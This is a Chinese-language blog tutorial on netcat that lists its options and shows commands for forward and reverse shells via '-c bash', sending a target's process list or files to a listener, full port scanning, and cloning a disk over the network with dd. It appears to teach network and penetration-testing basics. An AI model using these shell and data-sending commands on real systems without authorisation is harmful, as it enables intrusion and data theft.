image.png

Netcat是什么

NC（netcat）被稱為網絡工具中的瑞士軍刀，體積小巧，但功能強大。

Nc主要功能

Nc可以在兩臺設備上面相互交互，即偵聽模式/傳輸模式

• Telnet功能
• 獲取banner信息
• 傳輸文本信息
• 傳輸文件/目錄
• 加密傳輸文件，默認不加密
• 遠程控制
• 加密所有流量
• 流媒體服務器
• 遠程克隆硬盤

具體介紹

在此之前，先看看參數說明。
nc -h

image.png

• -c shell commands shell模式
• -e filename 程序重定向 [危險!!]
• -b 允許廣播
• -d 無命令行界面,使用后臺模式
• -g gateway 源路由跳躍點, 不超過8
• -G num 源路由指示器: 4, 8, 12, ...
• -h 獲取幫助信息
• -i secs 延時設置,端口掃描時使用
• -k 設置在socket上的存活選項
• -l 監(jiān)聽入站信息
• -n 以數字形式表示的IP地址
• -o file 使進制記錄
• -p port 本地端口
• -r 隨機本地和遠程的端口
• -q secs 在標準輸入且延遲后退出（翻譯的不是很好，后面實例介紹）
• -s addr 本地源地址
• -T tos 設置服務類型
• -t 以TELNET的形式應答入站請求
• -u UDP模式
• -v 顯示詳細信息 [使用=vv獲取更詳細的信息
• -w secs 連接超時設置
• -z I/O 模式 [掃描時使用]

其實常用的就幾個參數-n,-v,-l,-p,-q
.

NC遠程控制

這個比較有意思，我放在第一。
正向連接
A:nc -lp port -c bash
B:nc ip port
A將自己的Bash發(fā)給B
反向連接
A:nc -lp port
B:nc ip port -c bash
B將自己的Bash發(fā)給A
win下Bash換成cmd

image.png

image.png

image.png

hackerwing.com

使用NC進行信息收集

簡單的建立連接，就是偵聽模式和傳輸模式
nc -l -p port監(jiān)聽指定端口號
nc -nv ip port連接對方tcp端口，默認情況下，雙方可以發(fā)送文本信息
收集目標機上的進程信息
nc -l -p 4444 >wing.txt將遠程發(fā)送過來的內容保存在本地
Ps aux |nc -nv ip port -q 1 標準輸入完成后delay一秒鐘，會發(fā)送到偵聽端

wing

wing

wing

NC傳輸文件/目錄

nc -lp 4444 >1.txt 1.txt就是你要保存的文件名 自定義

nc -nv ip port <1.txt -q 1 將文件發(fā)送給偵聽端
ps：偵聽端的文件名最好按照文件本身來命名

tar -cvf - 目錄名/|nc -lp port -q 1
將目錄打包
nc -nv ip port |tar -xvf -
將目錄解包

NC文件加密傳輸

apt-get install mcrypt
A： nc -lp port|mcrypt - -flush -Fbqd -a rijndael-256 -m ecb >文件名
B：mcrypt --flush -Fbq -a rijndael-256 -m ecb <文件名|nc -nv ip port -q 1
理解：B將文件加密發(fā)送，A接受后先解密再保存到本地，B在1s后退出.
主要是利用mcrypt進行加密

NC流媒體服務

A:cat wing.mp4|nc -lp port
B:nc -nv ip port |mplayer -vo x11 -cache 4000
A讓wing.MP4這個文件成為流的形式發(fā)送到B，B用mplayer播放，接收多少播放多少，指定緩存4000bytes。

NC端口掃描

nc -nvz ip 1-65535

image.png

默認使用tcp進行掃描

NC復制磁盤

A:nc -lp port |dd of=/dev/sda
B: dd if=/dev/sda | nc -nc ip port -q 1
If是input filter
Of 是output filter
B將數據復制到A掛載的硬盤上

我的博客地址：hackerwing.com